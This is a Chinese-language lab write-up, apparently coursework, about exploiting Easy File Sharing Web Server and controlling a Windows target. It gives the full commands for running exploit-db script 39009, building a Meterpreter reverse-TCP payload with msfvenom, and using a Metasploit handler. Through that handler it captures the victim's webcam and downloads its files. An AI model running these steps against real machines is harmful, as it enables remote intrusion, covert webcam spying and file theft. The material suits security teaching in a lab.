easy flie sharing server漏洞的应用
首先,将easy file sharing server放入靶机(通过文件共享放入)
打开它
配置8000端口
在kali中输入 ,可观察到可用脚本,39009
searchsploit Easy File Sharing Web Server
再输入
python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000
最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;
二:Metasploit生成被控端程序与启动主控端
进入kali,输入 msfvenom -p windows/meterpreter/reverse_tcp lhost= kali主机ip lport=5000 -f exe -o /root/payload.exe
注:若找不到payload可用把后面改成 /home/kali/Desktop/payload.exe
直接生成程序在桌面
再把该程序放于被控的window中(要关闭电脑杀毒软件和防火墙,不然会被查杀删掉)
注:若打开过多payload,可进入任务处理器停止运行这两个程序,不然会非常卡。
再次回到kali,
输入 msfconsole ,进入Metasploit
再输入 use exploit/multi/handler 使用handler作为主控端
输入 set payload windows/meterpreter/reverse_tcp (注意是reverse,课本的代码写少了r)装载上payload
输入options 查看配置情况
输入 set lhost kali主机ip,主控主机kali
输入set lport 5000 控制端口链接 5000
最后输入 exploit
等待被控主机打开payload
打开后呈这样
即进入了被控系统
尝试输入 webcam_snap 1 控制被控电脑摄像头,并排一张照片存放于/root文件中
图片即为成功捕获被控摄像头排的照片
输入 ls 可获取被控端的桌面文件目录
download +文件名 可下载进kali /root文件夹了
所以说,不要胡乱下载未知程序,容易被病毒入侵。